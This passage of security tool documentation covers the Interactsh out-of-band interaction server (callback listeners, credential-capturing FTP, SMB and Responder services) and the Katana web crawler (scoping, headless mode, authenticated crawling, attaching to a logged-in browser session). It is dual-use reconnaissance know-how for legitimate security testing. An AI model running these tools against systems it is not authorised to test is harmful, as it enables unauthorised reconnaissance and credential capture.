interactsh-server -d hackwithautomation.com -http-directory ./paylods
```
![image](https://user-images.githubusercontent.com/8293321/179396480-d5ff8399-8b91-48aa-b21f-c67e40e80945.png)
### Dynamic HTTP Response
Interactsh http server optionally enables responding with dynamic HTTP response by using query parameters. This feature can be enabled by using `-dr` or `-dynamic-resp` flag.
The following query parameter names are supported - `body`, `header`, `status` and `delay`. Multiple `header` parameters can be specified to set multiple headers.
* **body** (response body)
* **header** (response header)
* **status** (response status code)
* **delay** (response time)
```console
curl -i 'https://hackwithautomation.com/x?status=307&body=this+is+example+body&delay=1&header=header1:value1&header=header1:value12'
HTTP/2 307
header1: value1
header1: value12
server: hackwithautomation.com
x-interactsh-version: 1.0.7
content-type: text/plain; charset=utf-8
content-length: 20
date: Tue, 13 Sep 2022 12:31:05 GMT
this is example body
```
> **Note**:
* Dynamic HTTP Response feature is disabled as default.
* By design, this feature lets anyone run client-side code / redirects using your interactsh domain / server
* Using this option with an isolated domain is recommended to **avoid security impact** on associated root/subdomains.
## Wildcard Interaction
To enable `wildcard` interaction for configured Interactsh domain `wildcard` flag can be used with implicit authentication protection via the `auth` flag if the `token` flag is omitted.
```console
interactsh-server -domain hackwithautomation.com -wildcard
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ v1.0.0
projectdiscovery.io
[INF] Client Token: 699c55544ce1604c63edb769e51190acaad1f239589a35671ccabd664385cfc7
[INF] Listening with the following services:
[HTTPS] Listening on TCP 157.230.223.165:443
[HTTP] Listening on TCP 157.230.223.165:80
[SMTPS] Listening on TCP 157.230.223.165:587
[LDAP] Listening on TCP 157.230.223.165:389
[SMTP] Listening on TCP 157.230.223.165:25
[DNS] Listening on TCP 157.230.223.165:53
[DNS] Listening on UDP 157.230.223.165:53
```
## Advanced Options
### Custom Payload Length
The length of the interactsh payload is **33** by default, consisting of **20** (unique correlation-id) + **13** (nonce token), which can be customized using the `cidl` and `cidn` flags to make shorter when required with self-hosted interacsh server.
```console
interactsh-server -d hackwithautomation.com -cidl 4 -cidn 6
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ v1.0.2
projectdiscovery.io
[INF] Loading existing SSL Certificate for: [*.hackwithautomation.com, hackwithautomation.com]
[INF] Listening with the following services:
[HTTPS] Listening on TCP 157.230.223.165:443
[SMTPS] Listening on TCP 157.230.223.165:587
[DNS] Listening on UDP 157.230.223.165:53
[HTTP] Listening on TCP 157.230.223.165:80
[LDAP] Listening on TCP 157.230.223.165:389
[SMTP] Listening on TCP 157.230.223.165:25
[DNS] Listening on TCP 157.230.223.165:53
```
**Note:** It is important and required to use same length on both side (**client** and **server**), otherwise co-relation will not work.
```console
interactsh-client -s hackwithautomation.com -cidl 4 -cidn 6
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ v1.0.2
projectdiscovery.io
[INF] Listing 1 payload for OOB Testing
[INF] c8rf4e8xm4.hackwithautomation.com
```
### Custom SSL Certificate
The [certmagic](https://github.com/caddyserver/certmagic) library is used by default by interactsh server to produce wildcard certificates for requested domain in an automatic way. To use your own SSL certificate with self-hosted interactsh server, `cert` and `privkey` flag can be used to provider required certificate files.
**Note:** To utilize all of the functionality of the SSL protocol, a wildcard certificate is mandatory.
```console
interactsh-server -d hackwithautomation.com -cert hackwithautomation.com.crt -privkey hackwithautomation.com.key
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ v1.0.2
projectdiscovery.io
[INF] Listening with the following services:
[HTTPS] Listening on TCP 157.230.223.165:443
[SMTP] Listening on TCP 157.230.223.165:25
[HTTP] Listening on TCP 157.230.223.165:80
[LDAP] Listening on TCP 157.230.223.165:389
[DNS] Listening on TCP 157.230.223.165:53
[SMTPS] Listening on TCP 157.230.223.165:587
[DNS] Listening on UDP 157.230.223.165:53
```
## Supported Protocols
### LDAP
As default, Interactsh server support LDAP interaction for the payload included in [search query](https://ldapwiki.com/wiki/LDAP%20Query%20Examples), additionally `ldap` flag can be used for complete logging.
```console
interactsh-server -domain hackwithautomation.com -sa -ldap
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ v1.0.0
projectdiscovery.io
[INF] Client Token: deb58fc151e6f0e53d448be3eb14cd7a11590d8950d142b9cd1abac3c2e3e7bc
[INF] Listening with the following services:
[DNS] Listening on UDP 157.230.223.165:53
[LDAP] Listening on TCP 157.230.223.165:389
[HTTP] Listening on TCP 157.230.223.165:80
[SMTP] Listening on TCP 157.230.223.165:25
[DNS] Listening on TCP 157.230.223.165:53
```
### FTP
FTP support can be enabled with the `-ftp` flag and is recommended for self-hosted instances only. The FTP agent simulates a fully-functional FTP server agent with authentication that captures authentications with every file operation. By default, the agent listens on port 21 (this can be changed with the `-ftp-port` flag) and lists in read-only mode the content of the OS default temporary directory (customizable with the `-ftp-dir` option).
Example of starting the FTP daemon and capturing a login interaction:
```console
$ sudo go run . -ftp -skip-acme -debug -domain localhost
...
[INF] Outbound IP: 192.168.1.16
[INF] Client Token: 6dc07e4a76c3d5e58e4bea13ce073dc403499b128c62397aff7b934a6e4822e3
[INF] Listening with the following services:
[DNS] Listening on TCP 192.168.1.16:53
[SMTP] Listening on TCP 192.168.1.16:25
[HTTP] Listening on TCP 192.168.1.16:80
[FTP] Listening on TCP 192.168.1.16:21
[DNS] Listening on UDP 192.168.1.16:53
[LDAP] Listening on TCP 192.168.1.16:389
[DBG] FTP Interaction:
{"protocol":"ftp","unique-id":"","full-id":"","raw-request":"USER test\ntest logging in","remote-address":"127.0.0.1:51564","timestamp":"2022-09-29T00:49:42.212323+02:00"}
```
### SMB
The `-smb` flag enables the Samba protocol (only for self-hosted instances). The samba protocol uses [impacket](https://github.com/SecureAuthCorp/impacket) `smbserver` class to simulate a samba daemon share listening on port `445` unless changed by the `-smb-port` flag. When enabled, interactsh executes under the hoods the script `smb_server.py`. Hence Python3 and impacket dependencies are required.
Example of enabling the samba server:
```console
$ sudo interactsh-server -smb -skip-acme -debug -domain localhost
```
### Responder
[Responder](https://github.com/lgandx/Responder) is wrapped in a docker container exposing various service ports via docker port forwarding. The interactions are retrieved by monitoring the shared log file `Responder-Session.log` in the temp folder. To use it on a self-hosted instance, it's necessary first to build the docker container and tag it as `interactsh`(docker daemon must be configured correctly and with port forwarding capabilities):
```console
docker build . -t interactsh
```
Then run the service with:
```console
$ sudo interactsh-server -responder -d localhost
```
On default settings, the daemon listens on the following ports:
* UDP: 137, 138, 1434
* TCP: 21 (might collide with FTP daemon if used), 110, 135, 139, 389, 445, 1433, 3141, 3128
# Interactsh Usage
Learn Interact usage including flags and filters
## Access help
Use `interactsh-client -h` to display all of the help options.
## Interactsh options
```yaml
Usage:
./interactsh-client [flags]
Flags:
INPUT:
-s, -server string interactsh server(s) to use (default "oast.pro,oast.live,oast.site,oast.online,oast.fun,oast.me")
CONFIG:
-config string flag configuration file (default "$HOME/.config/interactsh-client/config.yaml")
-n, -number int number of interactsh payload to generate (default 1)
-t, -token string authentication token to connect protected interactsh server
-pi, -poll-interval int poll interval in seconds to pull interaction data (default 5)
-nf, -no-http-fallback disable http fallback registration
-cidl, -correlation-id-length int length of the correlation id preamble (default 20)
-cidn, -correlation-id-nonce-length int length of the correlation id nonce (default 13)
-sf, -session-file string store/read from session file
FILTER:
-m, -match string[] match interaction based on the specified pattern
-f, -filter string[] filter interaction based on the specified pattern
-dns-only display only dns interaction in CLI output
-http-only display only http interaction in CLI output
-smtp-only display only smtp interactions in CLI output
UPDATE:
-up, -update update interactsh-client to latest version
-duc, -disable-update-check disable automatic interactsh-client update check
OUTPUT:
-o string output file to write interaction data
-json write output in JSONL(ines) format
-ps, -payload-store enable storing generated interactsh payload to file
-psf, -payload-store-file string store generated interactsh payloads to given file (default "interactsh_payload.txt")
-v display verbose interaction
DEBUG:
-version show version of the project
-health-check, -hc run diagnostic check up
```
# Installing Katana
Learn about how to install Katana
Enter the command below in a terminal to install ProjectDiscovery's Katana using Go.
```bash
go install github.com/projectdiscovery/katana/cmd/katana@latest
```
Enter the command below in a terminal to install ProjectDiscovery's Katana using Go.
To install/update Docker to the latest tag
```bash
docker pull projectdiscovery/katana:latest
```
Enter the command below in a terminal to install ProjectDiscovery's Katana using GitHub.
```bash
go install github.com/projectdiscovery/katana/cmd/katana@latest
```
For running Ubuntu we recommend installing the following prerequisits
```sh
sudo apt update
sudo snap refresh
sudo apt install zip curl wget git
sudo snap install golang --classic
wget -q -O - https://dl-ssl.google.com/linux/linux_signing_key.pub | sudo apt-key add -
sudo sh -c 'echo "deb http://dl.google.com/linux/chrome/deb/ stable main" >> /etc/apt/sources.list.d/google.list'
sudo apt update
sudo apt install google-chrome-stable
```
```bash
https://github.com/projectdiscovery/katana/releases
```
* Download the latest binary for your OS.
* Unzip the file to run binary.
## Installation Notes
* Katana requires the latest version of [**Go**](https://go.dev/doc/install)
* Add the Go bin path to the system paths. On OSX or Linux, in your terminal use
```
echo export $PATH=$PATH:$HOME/go/bin >> $home/.bashrc
source $home/.bashrc
```
* To add the Go bin path in Windows, [click this link for instructions.](https://www.architectryan.com/2018/03/17/add-to-the-path-on-windows-10/)
* The binary will be located in `$home/go/bin/katana`
# Katana Overview
A web crawling framework designed to navigate and parse for hidden details
## What is **Katana?**
Katana is a command-line interface (CLI) web crawling tool written in Golang, designed to be fast, efficient, and provide simple output.
It is designed to crawl websites to gather information and endpoints. One of its defining features is the ability to use headless browsing to crawl applications.
This means that it can crawl single-page applications (SPAs) built using technologies such as JavaScript, Angular, or React to effectively access and gather information from these types of applications.
* Check [out this great ProjectDiscovery blog post](https://blog.projectdiscovery.io/introducing-katana-the-best-cli-web-crawler/) from the initial launch for more information on Katana.
* We also [wrote a great “deep dive” blog](https://blog.projectdiscovery.io/a-deep-dive-on-katana-field-extraction/) on Katana’s field extraction
## Features and capabilities
* Fast and fully configurable web crawling
* Support for Standard and Headless modes
* JavaScript parsing and crawling support
* Customizable automatic form-filling
* Customizable output through preconfigured fields
* Customizable scope control through preconfigured fields and Regex
* Support Inputs through STDIN, URL, and LIST
* Supported Outputs of STDOUT, FILE, and JSON
## Additional Katana resources
As an open source tool with a robust community there are a lot of community-created resources available.
We are happy to share those to offer even more information about our tools.
Sharing these resources **is not formal approval or a recommendation** from ProjectDiscovery.
We cannot provide an endorsement of accuracy or validation that content is up-to-date. Anything shared here should be approached with caution.
* [https://medium.com/@sherlock297/katana-framework-how-to-use-it-to-scan-and-mass-collect-website-data-107f5ae326e0](https://medium.com/@sherlock297/katana-framework-how-to-use-it-to-scan-and-mass-collect-website-data-107f5ae326e0)
* [https://medium.com/@cuncis/katana-an-overview-of-the-powerful-web-application-security-scanner-cheat-sheet-6fc50236aff6](https://medium.com/@cuncis/katana-an-overview-of-the-powerful-web-application-security-scanner-cheat-sheet-6fc50236aff6)
* [https://www.geeksforgeeks.org/katana-crawling-and-spidering-framework/](https://www.geeksforgeeks.org/katana-crawling-and-spidering-framework/)
## Support
Questions about using Katana? Issues working through installation? Cool story or use case you want to share? Get in touch!
Check out the [Help](/help) section of the docs or reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Running Katana
Learn about running Katana with examples including commands and output
For all of the flags and options available for Katana be sure to check out the [Usage](/tools/katana/usage) page.
On this page we share examples of Katana with specific flags and goals and the output you can expect from each.
If you have questions, reach out to us through [Help](/help).
## Running Katana
Katana requires a URL or endpoint to crawl and accepts single or multiple inputs.
A URL can be provided using -u option, and multiple values can be provided using comma-separated input, similarly file input is supported using -list option and additionally piped input (stdin) is also supported.
### Input for katana
A URL can be provided using -u option, and multiple values can be provided using comma-separated input, similarly file input is supported using -list option and additionally piped input (stdin) is also supported.
#### URL Input
```sh
katana -u https://tesla.com
```
#### Multiple URL Input (comma-separated)
```sh
katana -u https://tesla.com,https://google.com
```
#### List Input
```bash
$ cat url_list.txt
https://tesla.com
https://google.com
```
```
katana -list url_list.txt
```
#### STDIN (piped) Input
```sh
echo https://tesla.com | katana
```
```sh
cat domains | httpx | katana
```
Example running katana -
```console
katana -u https://youtube.com
__ __
/ /_____ _/ /____ ____ ___ _
/ '_/ _ / __/ _ / _ \/ _ /
/_/\_\\_,_/\__/\_,_/_//_/\_,_/ v0.0.1
projectdiscovery.io
[WRN] Use with caution. You are responsible for your actions.
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
https://www.youtube.com/
https://www.youtube.com/about/
https://www.youtube.com/about/press/
https://www.youtube.com/about/copyright/
https://www.youtube.com/t/contact_us/
https://www.youtube.com/creators/
https://www.youtube.com/ads/
https://www.youtube.com/t/terms
https://www.youtube.com/t/privacy
https://www.youtube.com/about/policies/
https://www.youtube.com/howyoutubeworks?utm_campaign=ytgen&utm_source=ythp&utm_medium=LeftNav&utm_content=txt&u=https%3A%2F%2Fwww.youtube.com%2Fhowyoutubeworks%3Futm_source%3Dythp%26utm_medium%3DLeftNav%26utm_campaign%3Dytgen
https://www.youtube.com/new
https://m.youtube.com/
https://www.youtube.com/s/desktop/4965577f/jsbin/desktop_polymer.vflset/desktop_polymer.js
https://www.youtube.com/s/desktop/4965577f/cssbin/www-main-desktop-home-page-skeleton.css
https://www.youtube.com/s/desktop/4965577f/cssbin/www-onepick.css
https://www.youtube.com/s/_/ytmainappweb/_/ss/k=ytmainappweb.kevlar_base.0Zo5FUcPkCg.L.B1.O/am=gAE/d=0/rs=AGKMywG5nh5Qp-BGPbOaI1evhF5BVGRZGA
https://www.youtube.com/opensearch?locale=en_GB
https://www.youtube.com/manifest.webmanifest
https://www.youtube.com/s/desktop/4965577f/cssbin/www-main-desktop-watch-page-skeleton.css
https://www.youtube.com/s/desktop/4965577f/jsbin/web-animations-next-lite.min.vflset/web-animations-next-lite.min.js
https://www.youtube.com/s/desktop/4965577f/jsbin/custom-elements-es5-adapter.vflset/custom-elements-es5-adapter.js
https://www.youtube.com/s/desktop/4965577f/jsbin/webcomponents-sd.vflset/webcomponents-sd.js
https://www.youtube.com/s/desktop/4965577f/jsbin/intersection-observer.min.vflset/intersection-observer.min.js
https://www.youtube.com/s/desktop/4965577f/jsbin/scheduler.vflset/scheduler.js
https://www.youtube.com/s/desktop/4965577f/jsbin/www-i18n-constants-en_GB.vflset/www-i18n-constants.js
https://www.youtube.com/s/desktop/4965577f/jsbin/www-tampering.vflset/www-tampering.js
https://www.youtube.com/s/desktop/4965577f/jsbin/spf.vflset/spf.js
https://www.youtube.com/s/desktop/4965577f/jsbin/network.vflset/network.js
https://www.youtube.com/howyoutubeworks/
https://www.youtube.com/trends/
https://www.youtube.com/jobs/
https://www.youtube.com/kids/
```
## Crawling Mode
### Standard Mode
Standard crawling modality uses the standard go http library under the hood to handle HTTP requests/responses. This modality is much faster as it doesn't have the browser overhead. Still, it analyzes HTTP responses body as is, without any javascript or DOM rendering, potentially missing post-dom-rendered endpoints or asynchronous endpoint calls that might happen in complex web applications depending, for example, on browser-specific events.
### Headless Mode
Headless mode hooks internal headless calls to handle HTTP requests/responses directly within the browser context. This offers two advantages:
* The HTTP fingerprint (TLS and user agent) fully identify the client as a legitimate browser
* Better coverage since the endpoints are discovered analyzing the standard raw response, as in the previous modality, and also the browser-rendered one with javascript enabled.
Headless crawling is optional and can be enabled using `-headless` option.
Here are other headless CLI options -
```console
katana -h headless
Flags:
HEADLESS:
-hl, -headless enable headless hybrid crawling (experimental)
-sc, -system-chrome use local installed chrome browser instead of katana installed
-sb, -show-browser show the browser on the screen with headless mode
-ho, -headless-options string[] start headless chrome with additional options
-nos, -no-sandbox start headless chrome in --no-sandbox mode
-cdd, -chrome-data-dir string path to store chrome browser data
-scp, -system-chrome-path string use specified chrome browser for headless crawling
-noi, -no-incognito start headless chrome without incognito mode
-cwu, -chrome-ws-url string use chrome browser instance launched elsewhere with the debugger listening at this URL
-xhr, -xhr-extraction extract xhr requests
```
### `-no-sandbox`
***
Runs headless chrome browser with **no-sandbox** option, useful when running as root user.
```console
katana -u https://tesla.com -headless -no-sandbox
```
### *`-no-incognito`*
***
Runs headless chrome browser without incognito mode, useful when using the local browser.
```console
katana -u https://tesla.com -headless -no-incognito
```
### *`-headless-options`*
***
When crawling in headless mode, additional chrome options can be specified using `-headless-options`, for example -
```console
katana -u https://tesla.com -headless -system-chrome -headless-options --disable-gpu,proxy-server=http://127.0.0.1:8080
```
## Scope Control
Crawling can be endless if not scoped, as such katana comes with multiple support to define the crawl scope.
### *`-field-scope`*
***
Most handy option to define scope with predefined field name, `rdn` being default option for field scope.
* `rdn` - crawling scoped to root domain name and all subdomains (e.g. `*example.com`) (default)
* `fqdn` - crawling scoped to given sub(domain) (e.g. `www.example.com` or `api.example.com`)
* `dn` - crawling scoped to domain name keyword (e.g. `example`)
```console
katana -u https://tesla.com -fs dn
```
### *`-crawl-scope`*
***
For advanced scope control, `-cs` option can be used that comes with **regex** support.
```console
katana -u https://tesla.com -cs login
```
For multiple in scope rules, file input with multiline string / regex can be passed.
```bash
$ cat in_scope.txt
login/
admin/
app/
wordpress/
```
```console
katana -u https://tesla.com -cs in_scope.txt
```
### *`-crawl-out-scope`*
***
For defining what not to crawl, `-cos` option can be used and also support **regex** input.
```console
katana -u https://tesla.com -cos logout
```
For multiple out of scope rules, file input with multiline string / regex can be passed.
```bash
$ cat out_of_scope.txt
/logout
/log_out
```
```console
katana -u https://tesla.com -cos out_of_scope.txt
```
### *`-no-scope`*
***
Katana is default to scope `*.domain`, to disable this `-ns` option can be used and also to crawl the internet.
```console
katana -u https://tesla.com -ns
```
## *`-display-out-scope`*
As default, when scope option is used, it also applies for the links to display as output, as such **external URLs are default to exclude** and to overwrite this behavior, `-do` option can be used to display all the external URLs that exist in targets scoped URL / Endpoint.
```
katana -u https://tesla.com -do
```
Here is all the CLI options for the scope control -
```console
katana -h scope
Flags:
SCOPE:
-cs, -crawl-scope string[] in scope url regex to be followed by crawler
-cos, -crawl-out-scope string[] out of scope url regex to be excluded by crawler
-fs, -field-scope string pre-defined scope field (dn,rdn,fqdn) (default "rdn")
-ns, -no-scope disables host based default scope
-do, -display-out-scope display external endpoint from scoped crawling
```
## Crawler Configuration
Katana comes with multiple options to configure and control the crawl as the way we want.
### *`-depth`*
***
Option to define the `depth` to follow the urls for crawling, the more depth the more number of endpoint being crawled + time for crawl.
```
katana -u https://tesla.com -d 5
```
### *`-js-crawl`*
***
Option to enable JavaScript file parsing + crawling the endpoints discovered in JavaScript files, disabled as default.
```
katana -u https://tesla.com -jc
```
### *`-crawl-duration`*
***
Option to predefined crawl duration, disabled as default.
```
katana -u https://tesla.com -ct 2
```
### *`-known-files`*
***
Option to enable crawling `robots.txt` and `sitemap.xml` file, disabled as default.
```
katana -u https://tesla.com -kf robotstxt,sitemapxml
```
### *`-automatic-form-fill`*
***
Option to enable automatic form filling for known / unknown fields, known field values can be customized as needed by updating form config file at `$HOME/.config/katana/form-config.yaml`.
Automatic form filling is experimental feature.
```
katana -u https://tesla.com -aff
```
## Authenticated Crawling
Authenticated crawling involves including custom headers or cookies in HTTP requests to access protected resources. These headers provide authentication or authorization information, allowing you to crawl authenticated content / endpoint. You can specify headers directly in the command line or provide them as a file with katana to perfrom authenticated crawling.
> **Note**: User needs to be manually perform the authentication and export the session cookie / header to file to use with katana.
### *`-headers`*
***
Option to add a custom header or cookie to the request.
> Syntax of [headers](https://datatracker.ietf.org/doc/html/rfc7230#section-3.2) in the HTTP specification
Here is an example of adding a cookie to the request:
```
katana -u https://tesla.com -H 'Cookie: usrsess=AmljNrESo'
```
It is also possible to supply headers or cookies as a file. For example:
```
$ cat cookie.txt
Cookie: PHPSESSIONID=XXXXXXXXX
X-API-KEY: XXXXX
TOKEN=XX
```
```
katana -u https://tesla.com -H cookie.txt
```
There are more options to configure when needed, here is all the config related CLI options -
```console
katana -h config
Flags:
CONFIGURATION:
-r, -resolvers string[] list of custom resolver (file or comma separated)
-d, -depth int maximum depth to crawl (default 3)
-jc, -js-crawl enable endpoint parsing / crawling in javascript file
-ct, -crawl-duration int maximum duration to crawl the target for
-kf, -known-files string enable crawling of known files (all,robotstxt,sitemapxml)
-mrs, -max-response-size int maximum response size to read (default 9223372036854775807)
-timeout int time to wait for request in seconds (default 10)
-aff, -automatic-form-fill enable automatic form filling (experimental)
-fx, -form-extraction enable extraction of form, input, textarea & select elements
-retry int number of times to retry the request (default 1)
-proxy string http/socks5 proxy to use
-H, -headers string[] custom header/cookie to include in request
-config string path to the katana configuration file
-fc, -form-config string path to custom form configuration file
-flc, -field-config string path to custom field configuration file
-s, -strategy string Visit strategy (depth-first, breadth-first) (default "depth-first")
```
## Connecting to Active Browser Session
Katana can also connect to active browser session where user is already logged in and authenticated. and use it for crawling. The only requirement for this is to start browser with remote debugging enabled.
Here is an example of starting chrome browser with remote debugging enabled and using it with katana -
**step 1) First Locate path of chrome executable**
| Operating System | Chromium Executable Location | Google Chrome Executable Location |
| ---------------- | --------------------------------------------------------------- | -------------------------------------------------------------- |
| Windows (64-bit) | `C:\Program Files (x86)\Google\Chromium\Application\chrome.exe` | `C:\Program Files (x86)\Google\Chrome\Application\chrome.exe` |
| Windows (32-bit) | `C:\Program Files\Google\Chromium\Application\chrome.exe` | `C:\Program Files\Google\Chrome\Application\chrome.exe` |
| macOS | `/Applications/Chromium.app/Contents/MacOS/Chromium` | `/Applications/Google Chrome.app/Contents/MacOS/Google Chrome` |
| Linux | `/usr/bin/chromium` | `/usr/bin/google-chrome` |
**step 2) Start chrome with remote debugging enabled and it will return websocker url. For example, on MacOS, you can start chrome with remote debugging enabled using following command** -
```console
$ /Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --remote-debugging-port=9222
DevTools listening on ws://127.0.0.1:9222/devtools/browser/c5316c9c-19d6-42dc-847a-41d1aeebf7d6
```
> Now login to the website you want to crawl and keep the browser open.
**step 3) Now use the websocket url with katana to connect to the active browser session and crawl the website**
```console
katana -headless -u https://tesla.com -cwu ws://127.0.0.1:9222/devtools/browser/c5316c9c-19d6-42dc-847a-41d1aeebf7d6 -no-incognito
```
> **Note**: you can use `-cdd` option to specify custom chrome data directory to store browser data and cookies but that does not save session data if cookie is set to `Session` only or expires after certain time.
## Filters
### *`-field`*
***
Katana comes with built in fields that can be used to filter the output for the desired information, `-f` option can be used to specify any of the available fields.
```
-f, -field string field to display in output (url,path,fqdn,rdn,rurl,qurl,qpath,file,key,value,kv,dir,udir)
```
Here is a table with examples of each field and expected output when used -
| FIELD | DESCRIPTION | EXAMPLE |
| ------- | --------------------------- | ----------------------------------------------------------------------------- |
| `url` | URL Endpoint | `https://admin.projectdiscovery.io/admin/login?user=admin&password=admin` |
| `qurl` | URL including query param | `https://admin.projectdiscovery.io/admin/login.php?user=admin&password=admin` |
| `qpath` | Path including query param | `/login?user=admin&password=admin` |
| `path` | URL Path | `https://admin.projectdiscovery.io/admin/login` |
| `fqdn` | Fully Qualified Domain name | `admin.projectdiscovery.io` |
| `rdn` | Root Domain name | `projectdiscovery.io` |
| `rurl` | Root URL | `https://admin.projectdiscovery.io` |
| `ufile` | URL with File | `https://admin.projectdiscovery.io/login.js` |
| `file` | Filename in URL | `login.php` |
| `key` | Parameter keys in URL | `user,password` |
| `value` | Parameter values in URL | `admin,admin` |
| `kv` | Keys=Values in URL | `user=admin&password=admin` |
| `dir` | URL Directory name | `/admin/` |
| `udir` | URL with Directory | `https://admin.projectdiscovery.io/admin/` |
Here is an example of using field option to only display all the urls with query parameter in it -
```
katana -u https://tesla.com -f qurl -silent
https://shop.tesla.com/en_au?redirect=no
https://shop.tesla.com/en_nz?redirect=no
https://shop.tesla.com/product/men_s-raven-lightweight-zip-up-bomber-jacket?sku=1740250-00-A
https://shop.tesla.com/product/tesla-shop-gift-card?sku=1767247-00-A
https://shop.tesla.com/product/men_s-chill-crew-neck-sweatshirt?sku=1740176-00-A
https://www.tesla.com/about?redirect=no
https://www.tesla.com/about/legal?redirect=no
https://www.tesla.com/findus/list?redirect=no
```
### Custom Fields
You can create custom fields to extract and store specific information from page responses using regex rules. These custom fields are defined using a YAML config file and are loaded from the default location at `$HOME/.config/katana/field-config.yaml`. Alternatively, you can use the `-flc` option to load a custom field config file from a different location.
Here is example custom field.
```yaml
- name: email
type: regex
regex:
- '([a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+\.[a-zA-Z0-9_-]+)'
- '([a-zA-Z0-9+._-]+@[a-zA-Z0-9._-]+\.[a-zA-Z0-9_-]+)'
- name: phone
type: regex
regex:
- '\d{3}-\d{8}|\d{4}-\d{7}'
```
When defining custom fields, following attributes are supported:
* **name** (required)
> The value of **name** attribute is used as the `-field` cli option value.
* **type** (required)
> The type of custom attribute, currenly supported option - `regex`
* **part** (optional)
> The part of the response to extract the information from. The default value is `response`, which includes both the header and body. Other possible values are `header` and `body`.
* group (optional)
> You can use this attribute to select a specific matched group in regex, for example: `group: 1`
#### Running katana using custom field:
```console
katana -u https://tesla.com -f email,phone
```
## *`-store-field`*
To compliment `field` option which is useful to filter output at run time, there is `-sf, -store-fields` option which works exactly like field option except instead of filtering, it stores all the information on the disk under `katana_field` directory sorted by target url.
```
katana -u https://tesla.com -sf key,fqdn,qurl -silent
```
```bash
$ ls katana_field/
https_www.tesla.com_fqdn.txt
https_www.tesla.com_key.txt
https_www.tesla.com_qurl.txt
```
The `-store-field` option can be useful for collecting information to build a targeted wordlist for various purposes, including but not limited to:
* Identifying the most commonly used parameters
* Discovering frequently used paths
* Finding commonly used files
* Identifying related or unknown subdomains
## Katana Filters
### *`-extension-match`*
***
Crawl output can be easily matched for specific extension using `-em` option to ensure to display only output containing given extension.
```
katana -u https://tesla.com -silent -em js,jsp,json
```
### *`-extension-filter`*
***
Crawl output can be easily filtered for specific extension using `-ef` option which ensure to remove all the urls containing given extension.
```
katana -u https://tesla.com -silent -ef css,txt,md
```
### *`-match-regex`*
***
The `-match-regex` or `-mr` flag allows you to filter output URLs using regular expressions. When using this flag, only URLs that match the specified regular expression will be printed in the output.
```
katana -u https://tesla.com -mr 'https://shop\.tesla\.com/*' -silent
```
## *`-filter-regex`*
The `-filter-regex` or `-fr` flag allows you to filter output URLs using regular expressions. When using this flag, it will skip the URLs that are match the specified regular expression.
```
katana -u https://tesla.com -fr 'https://www\.tesla\.com/*' -silent
```
### Advance Filtering
Katana supports DSL-based expressions for advanced matching and filtering capabilities:
* To match endpoints with a 200 status code:
```shell
katana -u https://www.hackerone.com -mdc 'status_code == 200'
```
* To match endpoints that contain "default" and have a status code other than 403:
```shell
katana -u https://www.hackerone.com -mdc 'contains(endpoint, "default") && status_code != 403'
```
* To match endpoints with PHP technologies:
```shell
katana -u https://www.hackerone.com -mdc 'contains(to_lower(technologies), "php")'
```
* To filter out endpoints running on Cloudflare:
```shell
katana -u https://www.hackerone.com -fdc 'contains(to_lower(technologies), "cloudflare")'
```
DSL functions can be applied to any keys in the jsonl output. For more information on available DSL functions, please visit the [dsl project](https://github.com/projectdiscovery/dsl).
Here are additional filter options -
```console
katana -h filter
Flags:
FILTER:
-mr, -match-regex string[] regex or list of regex to match on output url (cli, file)
-fr, -filter-regex string[] regex or list of regex to filter on output url (cli, file)
-f, -field string field to display in output (url,path,fqdn,rdn,rurl,qurl,qpath,file,ufile,key,value,kv,dir,udir)
-sf, -store-field string field to store in per-host output (url,path,fqdn,rdn,rurl,qurl,qpath,file,ufile,key,value,kv,dir,udir)
-em, -extension-match string[] match output for given extension (eg, -em php,html,js)
-ef, -extension-filter string[] filter output for given extension (eg, -ef png,css)
-mdc, -match-condition string match response with dsl based condition
-fdc, -filter-condition string filter response with dsl based condition
```
## Rate Limit
It's easy to get blocked / banned while crawling if not following target websites limits, katana comes with multiple option to tune the crawl to go as fast / slow we want.
### *`-delay`*
***
option to introduce a delay in seconds between each new request katana makes while crawling, disabled as default.
```
katana -u https://tesla.com -delay 20
```
### *`-concurrency`*
***
option to control the number of urls per target to fetch at the same time.
```
katana -u https://tesla.com -c 20
```
### *`-parallelism`*
***
option to define number of target to process at same time from list input.
```
katana -u https://tesla.com -p 20
```
### *`-rate-limit`*
***
option to use to define max number of request can go out per second.
```
katana -u https://tesla.com -rl 100
```
### *`-rate-limit-minute`*
***
option to use to define max number of request can go out per minute.
```
katana -u https://tesla.com -rlm 500
```
Here is all long / short CLI options for rate limit control -
```console
katana -h rate-limit
Flags:
RATE-LIMIT:
-c, -concurrency int number of concurrent fetchers to use (default 10)
-p, -parallelism int number of concurrent inputs to process (default 10)
-rd, -delay int request delay between each request in seconds
-rl, -rate-limit int maximum requests to send per second (default 150)
-rlm, -rate-limit-minute int maximum number of requests to send per minute
```
## Output
Katana support both file output in plain text format as well as JSON which includes additional information like, `source`, `tag`, and `attribute` name to co-related the discovered endpoint.
### *`-output`*
